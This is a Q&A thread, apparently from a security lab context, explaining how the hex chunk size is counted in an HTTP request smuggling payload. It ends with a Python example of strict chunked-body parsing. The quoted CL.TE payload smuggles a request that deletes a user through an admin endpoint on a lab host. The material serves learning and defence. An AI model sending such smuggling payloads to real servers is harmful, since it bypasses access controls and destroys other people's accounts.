ivreznap

Reputation: 27

How to count Transfer-Encoding: chunked chunk size

I'm not getting how the size is counted in Transfer-Encoding: chunked. Can anyone explain this chunk size, please? Thank you.

POST / HTTP/1.1
Host: your-lab-id.web-security-academy.net
Content-length: 4
Transfer-Encoding: chunked

87
GET /admin/delete?username=carlos HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

Upvotes: 0

Views: 3127

Answers (1)

ash.shiddiqul

Reputation: 11

When studying HTTP request smuggling, I struggled too in working out how the chunk size is counted. I've found the example from Wikipedia to be very helpful (https://en.wikipedia.org/wiki/Chunked_transfer_encoding#Example).

So let me try to help you out here, as this is actually a good exercise for me too.

87
GET /admin/delete?username=carlos HTTP/1.1
Host: localhost
Content-Type: application/x-www-form-urlencoded
Content-Length: 15

x=1
0

The 87 there is in hex form. In decimal form, it's 135. Thus the chunk size is 135 bytes.

Then, for every line below 87 we count every character (assuming 1 character equals 1 byte) and then add 2 bytes for CRLF (\r\n), except for the last line above 0, for which we don't need to count the trailing CRLF.

Thus it goes something like this:

GET /admin/delete?username=carlos HTTP/1.1 -> 42 + 2 bytes for \r\n = 44 bytes
Host: localhost -> 15 + 2 = 17 bytes
Content-Type: application/x-www-form-urlencoded -> 47 + 2 = 49 bytes
Content-Length: 15 -> 18 + 2 = 20 bytes
 -> 0 + 2 = 2 bytes
x=1 -> 3 bytes

Thus in total there are 135 bytes of chunked data.

Hope this could help.

Upvotes: 1
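The byte count from the answer above, as an added example that is not part of the original posts: it rebuilds the chunk data from the question with CRLF line endings, derives the hex size, and parses the chunked body with a strict check that each declared size matches the bytes that follow. The names `CHUNK_DATA`, `encode_chunk` and `parse_chunked` are hypothetical, and the sample body is constructed from the request shown in the question.

```python
CRLF = b"\r\n"
HEX_DIGITS = b"0123456789abcdefABCDEF"

# The chunk data from the question, rebuilt with CRLF line endings (constructed sample).
CHUNK_DATA = CRLF.join([
    b"GET /admin/delete?username=carlos HTTP/1.1",
    b"Host: localhost",
    b"Content-Type: application/x-www-form-urlencoded",
    b"Content-Length: 15",
    b"",
    b"x=1",  # last line: its trailing CRLF is framing, not chunk data
])

def encode_chunk(data: bytes) -> bytes:
    """Frame data as one chunk: size in hex, CRLF, data, CRLF."""
    return b"%x" % len(data) + CRLF + data + CRLF

def parse_chunked(body: bytes) -> list:
    """Decode a chunked body; raise ValueError when a declared size is wrong."""
    chunks, pos = [], 0
    while True:
        eol = body.find(CRLF, pos)
        if eol < 0:
            raise ValueError("no CRLF after chunk size")
        size_field = body[pos:eol].split(b";", 1)[0]  # ignore chunk extensions
        if not size_field or any(c not in HEX_DIGITS for c in size_field):
            raise ValueError(f"bad chunk size {size_field!r}")
        size = int(size_field, 16)  # the size line is hexadecimal
        if size == 0:  # last chunk; trailer fields are ignored here
            return chunks
        start, end = eol + 2, eol + 2 + size
        if body[end:end + 2] != CRLF:  # data must be followed by exactly CRLF
            raise ValueError(f"chunk declares {size} bytes but framing does not match")
        chunks.append(body[start:end])
        pos = end + 2

if __name__ == "__main__":
    body = encode_chunk(CHUNK_DATA) + b"0" + CRLF + CRLF
    print(len(CHUNK_DATA), body[:2])            # decimal length and hex size line
    print(parse_chunked(body) == [CHUNK_DATA])  # round trip through the parser
```

A parser that tolerates a size line that disagrees with the data is what lets a front end and a back end see different request boundaries, so the mismatch is raised as an error rather than repaired.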
